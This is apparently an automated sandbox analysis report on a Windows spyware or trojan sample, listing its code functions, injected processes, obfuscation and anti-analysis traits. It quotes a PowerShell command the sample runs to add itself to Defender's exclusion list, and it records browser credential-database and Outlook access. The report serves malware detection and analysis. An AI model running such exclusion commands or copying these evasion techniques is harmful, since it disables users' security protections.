                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A27A467_2_04A27A46
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2FA497_2_04A2FA49
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049E3A6C7_2_049E3A6C
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0498FB807_2_0498FB80
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049ADBF97_2_049ADBF9
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049E5BF07_2_049E5BF0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2FB767_2_04A2FB76
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007A1F607_2_007A1F60
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079D0707_2_0079D070
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079B0807_2_0079B080
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079B1D07_2_0079B1D0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079B1C47_2_0079B1C4
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079B2977_2_0079B297
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007A55F07_2_007A55F0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007A37F07_2_007A37F0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007A37EB7_2_007A37EB
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007BBCD07_2_007BBCD0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079CE507_2_0079CE50
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079CE487_2_0079CE48
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0484E6CC7_2_0484E6CC
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0484E2B67_2_0484E2B6
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0484E3D37_2_0484E3D3
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0484D8387_2_0484D838
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0484CB237_2_0484CB23
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: String function: 0188F290 appears 103 times
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: String function: 01857E54 appears 99 times
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: String function: 017FB970 appears 262 times
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: String function: 0187EA12 appears 86 times
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: String function: 01845130 appears 58 times
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 0495B970 appears 257 times
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 049B7E54 appears 99 times
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 049DEA12 appears 86 times
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 049A5130 appears 58 times
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 049EF290 appears 103 times
                      Source: IETC-24017.exe, 00000000.00000002.1692106162.0000000006D90000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs IETC-24017.exe
                      Source: IETC-24017.exe, 00000000.00000002.1695361828.00000000074E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs IETC-24017.exe
                      Source: IETC-24017.exe, 00000000.00000002.1683716815.0000000002701000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs IETC-24017.exe
                      Source: IETC-24017.exe, 00000000.00000002.1682805496.000000000098E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs IETC-24017.exe
                      Source: IETC-24017.exe, 00000003.00000002.1822408651.00000000018FD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs IETC-24017.exe
                      Source: IETC-24017.exe, 00000003.00000002.1821955897.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameopnfiles.exej% vs IETC-24017.exe
                      Source: IETC-24017.exe, 00000003.00000002.1821955897.0000000001368000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameopnfiles.exej% vs IETC-24017.exe
                      Source: IETC-24017.exe | Binary or memory string: OriginalFilenameWyjV.exe@ vs IETC-24017.exe
                      Source: IETC-24017.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: IETC-24017.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.IETC-24017.exe.6d90000.3.raw.unpack, id.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.IETC-24017.exe.371e790.1.raw.unpack, id.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, sPymH4i2o29WVBQPb7.cs | Security API names: _0020.SetAccessControl
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, sPymH4i2o29WVBQPb7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, sPymH4i2o29WVBQPb7.cs | Security API names: _0020.AddAccessRule
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, Iht7kKNJwU57iwhQqv.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/7@18/14
                      Source: C:\Users\user\Desktop\IETC-24017.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IETC-24017.exe.log
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3448:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kll1lkb0.amr.ps1
                      Source: IETC-24017.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\IETC-24017.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\IETC-24017.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: openfiles.exe, 00000007.00000003.2006355424.0000000002BCB000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2006245399.0000000002BAA000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4123887775.0000000002BCB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: IETC-24017.exe | ReversingLabs: Detection: 42%
                      Source: unknown | Process created: C:\Users\user\Desktop\IETC-24017.exe "C:\Users\user\Desktop\IETC-24017.exe"
                      Source: C:\Users\user\Desktop\IETC-24017.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe"
                      Source: C:\Users\user\Desktop\IETC-24017.exe | Process created: C:\Users\user\Desktop\IETC-24017.exe "C:\Users\user\Desktop\IETC-24017.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe | Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
                      Source: C:\Windows\SysWOW64\openfiles.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\IETC-24017.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\IETC-24017.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\SysWOW64\openfiles.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: IETC-24017.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: IETC-24017.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: IETC-24017.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WyjV.pdb source: IETC-24017.exe
                      Source: Binary string: OpnFiles.pdb source: IETC-24017.exe, 00000003.00000002.1821955897.0000000001368000.00000004.00000020.00020000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000003.1908291913.0000000001232000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UFUUPGsATdE.exe, 00000006.00000002.4124119366.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: IETC-24017.exe, 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.1822081128.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.1824349392.0000000004789000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: IETC-24017.exe, IETC-24017.exe, 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000007.00000003.1822081128.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.1824349392.0000000004789000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: OpnFiles.pdbGCTL source: IETC-24017.exe, 00000003.00000002.1821955897.0000000001368000.00000004.00000020.00020000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000003.1908291913.0000000001232000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: WyjV.pdbSHA256H source: IETC-24017.exe

                      Data Obfuscation

                      Source: 0.2.IETC-24017.exe.6d90000.3.raw.unpack, id.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.IETC-24017.exe.371e790.1.raw.unpack, id.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: IETC-24017.exe, LogInGUI.cs .Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, sPymH4i2o29WVBQPb7.cs .Net Code: NoFdbL1XQW System.Reflection.Assembly.Load(byte[])
                      Source: 6.2.UFUUPGsATdE.exe.585cd14.1.raw.unpack, LogInGUI.cs .Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 7.2.openfiles.exe.4f5cd14.2.raw.unpack, LogInGUI.cs .Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 11.2.firefox.exe.2715cd14.0.raw.unpack, LogInGUI.cs .Net Code: InitializeComponent contains xor as well as GetObject
                      Source: IETC-24017.exe Static PE information: 0xA1FAACB2 [Sat Feb 12 05:46:26 2056 UTC]
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 0_2_025CF362 push cs; retf 0_2_025CF395
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 0_2_025CF3F0 push esp; iretd 0_2_025CF3F1
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 0_2_04D1F4D7 pushfd ; iretd 0_2_04D1F4E6
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 0_2_06ECC3DE push esp; retf 0_2_06ECC3DF
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 0_2_06EC5931 push 200516F3h; iretd 0_2_06EC593D
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0041A8C6 push eax; iretd 3_2_0041A8C7
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0040214D push 353832D5h; retf 3_2_00402152
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0040D97D push ss; retf 3_2_0040D9A4
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0040D98A push ss; retf 3_2_0040D9A4
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0040DAFD push esp; retf 3_2_0040DAFC
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0040DA96 push esp; retf 3_2_0040DAFC
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_004032B0 push eax; ret 3_2_004032B2
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0040DAB1 push esp; retf 3_2_0040DAFC
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_00417B70 pushfd ; iretd 3_2_00417B71
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_00401B0A push cs; iretd 3_2_00401B0B
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_00404BD0 push AECA29B3h; iretd 3_2_00404BD5
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_004183E9 push eax; retf 3_2_004183EA
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_00417401 push ebx; ret 3_2_00417416
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_00413D95 push 95C026B5h; iretd 3_2_00413D9B
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0041865C push edx; retf 3_2_0041865D
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0041767F push FFFFFFCEh; retf 3_2_00417681
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0040BE09 push ebp; ret 3_2_0040BE0A
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_004146EC pushad ; ret 3_2_004146ED
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0040D7E9 push cs; ret 3_2_0040D7F3
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_018009AD push ecx; mov dword ptr [esp], ecx 3_2_018009B6
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe Code function: 6_2_07CB774A push AECA29B3h; iretd 6_2_07CB774F
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe Code function: 6_2_07CC9F7B push ebx; ret 6_2_07CC9F90
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe Code function: 6_2_07CCA6EA pushfd ; iretd 6_2_07CCA6EB
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe Code function: 6_2_07CCD440 push eax; iretd 6_2_07CCD441
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe Code function: 6_2_07CC83CD push ebp; ret 6_2_07CC83CE
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe Code function: 6_2_07CC8A2C push edx; iretd 6_2_07CC8A48
                      Source: IETC-24017.exe Static PE information: section name: .text entropy: 7.942883165317064
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack: High entropy of concatenated method names (reported for 23 .cs classes)

                      Hooking and other Techniques for Hiding and Protection

                      Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (15).png
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\openfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: IETC-24017.exe PID: 5296, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\openfiles.exe API/Special instruction interceptor: Address: 7FFE2220D324
                      Source: C:\Windows\SysWOW64\openfiles.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
                      Source: C:\Windows\SysWOW64\openfiles.exe API/Special instruction interceptor: Address: 7FFE2220D944
                      Source: C:\Windows\SysWOW64\openfiles.exe API/Special instruction interceptor: Address: 7FFE2220D504
                      Source: C:\Windows\SysWOW64\openfiles.exe API/Special instruction interceptor: Address: 7FFE2220D544
                      Source: C:\Windows\SysWOW64\openfiles.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
                      Source: C:\Windows\SysWOW64\openfiles.exe API/Special instruction interceptor: Address: 7FFE22210154
                      Source: C:\Windows\SysWOW64\openfiles.exe API/Special instruction interceptor: Address: 7FFE2220DA44
                      Source: C:\Users\user\Desktop\IETC-24017.exe Memory allocated: 2520000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\IETC-24017.exe Memory allocated: 2700000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\IETC-24017.exe Memory allocated: 7670000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\IETC-24017.exe Memory allocated: 8670000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\IETC-24017.exe Memory allocated: 8820000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\IETC-24017.exe Memory allocated: 9820000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0184096E rdtsc 3_2_0184096E
                      Source: C:\Users\user\Desktop\IETC-24017.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6193
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1481
                      Source: C:\Windows\SysWOW64\openfiles.exe Window / User API: threadDelayed 5261
                      Source: C:\Windows\SysWOW64\openfiles.exe Window / User API: threadDelayed 4712
                      Source: C:\Users\user\Desktop\IETC-24017.exe API coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\openfiles.exe API coverage: 2.7 %
                      Source: C:\Users\user\Desktop\IETC-24017.exe TID: 1344 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7204 Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe TID: 7636 Thread sleep time: -75000s >= -30000s
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe TID: 7636 Thread sleep count: 38 > 30
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe TID: 7636 Thread sleep time: -57000s >= -30000s
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe TID: 7636 Thread sleep time: -38000s >= -30000s
                      Source: C:\Windows\SysWOW64\openfiles.exe TID: 7496 Thread sleep count: 5261 > 30
                      Source: C:\Windows\SysWOW64\openfiles.exe TID: 7496 Thread sleep time: -10522000s >= -30000s
                      Source: C:\Windows\SysWOW64\openfiles.exe TID: 7496 Thread sleep count: 4712 > 30
                      Source: C:\Windows\SysWOW64\openfiles.exe TID: 7496 Thread sleep time: -9424000s >= -30000s
                      Source: C:\Windows\SysWOW64\openfiles.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\openfiles.exe Code function: 7_2_007AC810 FindFirstFileW,FindNextFileW,FindClose,7_2_007AC810
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4124367001.0000000001230000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ4~L
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmp Binary or memory string: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDVetU28pvZ34yHvxpWXSkTDrLK3GZY4KTcvrekEZG6yjfLNdbj2Uh03XrTe6i%2B27H4n49ja8Ogi1Rdb6chgfSukWlb8GlKvcL1Yvr%2Bkx55u9rn4ZQlfum6oUCKyIu8VGNphQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(&
                      Source: firefox.exe, 0000000B.00000002.2124953475.00000220270FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUU
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\IETC-24017.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\openfiles.exe Process queried: DebugPort
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_00417A33 LdrLoadDll,3_2_00417A33
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_01840185 mov eax, dword ptr fs:[00000030h] 3_2_01840185
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_018BC188 mov eax, dword ptr fs:[00000030h] 3_2_018BC188
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_018A4180 mov eax, dword ptr fs:[00000030h] 3_2_018A4180
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0188019F mov eax, dword ptr fs:[00000030h] 3_2_0188019F
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_017FC156 mov eax, dword ptr fs:[00000030h] 3_2_017FC156
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_018C61C3 mov eax, dword ptr fs:[00000030h] 3_2_018C61C3
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0187E1D0 mov eax, dword ptr fs:[00000030h] 3_2_0187E1D0
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_0187E1D0 mov ecx, dword ptr fs:[00000030h] 3_2_0187E1D0
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_018D61E5 mov eax, dword ptr fs:[00000030h] 3_2_018D61E5
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_018301F8 mov eax, dword ptr fs:[00000030h] 3_2_018301F8
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_018AE10E mov eax, dword ptr fs:[00000030h] 3_2_018AE10E
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_018AE10E mov ecx, dword ptr fs:[00000030h] 3_2_018AE10E
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_018AA118 mov ecx, dword ptr fs:[00000030h] 3_2_018AA118
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_018AA118 mov eax, dword ptr fs:[00000030h] 3_2_018AA118
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_018C0115 mov eax, dword ptr fs:[00000030h] 3_2_018C0115
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_01830124 mov eax, dword ptr fs:[00000030h] 3_2_01830124
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_01894144 mov eax, dword ptr fs:[00000030h] 3_2_01894144
                      Source: C:\Users\user\Desktop\IETC-24017.exe Code function: 3_2_01894144 mov ecx, dword ptr fs:[00000030h] 3_2_01894144
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01898158 mov eax, dword ptr fs:[00000030h]3_2_01898158
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01806154 mov eax, dword ptr fs:[00000030h]3_2_01806154
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01806154 mov eax, dword ptr fs:[00000030h]3_2_01806154
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FA197 mov eax, dword ptr fs:[00000030h]3_2_017FA197
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FA197 mov eax, dword ptr fs:[00000030h]3_2_017FA197
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FA197 mov eax, dword ptr fs:[00000030h]3_2_017FA197
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180208A mov eax, dword ptr fs:[00000030h]3_2_0180208A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018980A8 mov eax, dword ptr fs:[00000030h]3_2_018980A8
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C60B8 mov eax, dword ptr fs:[00000030h]3_2_018C60B8
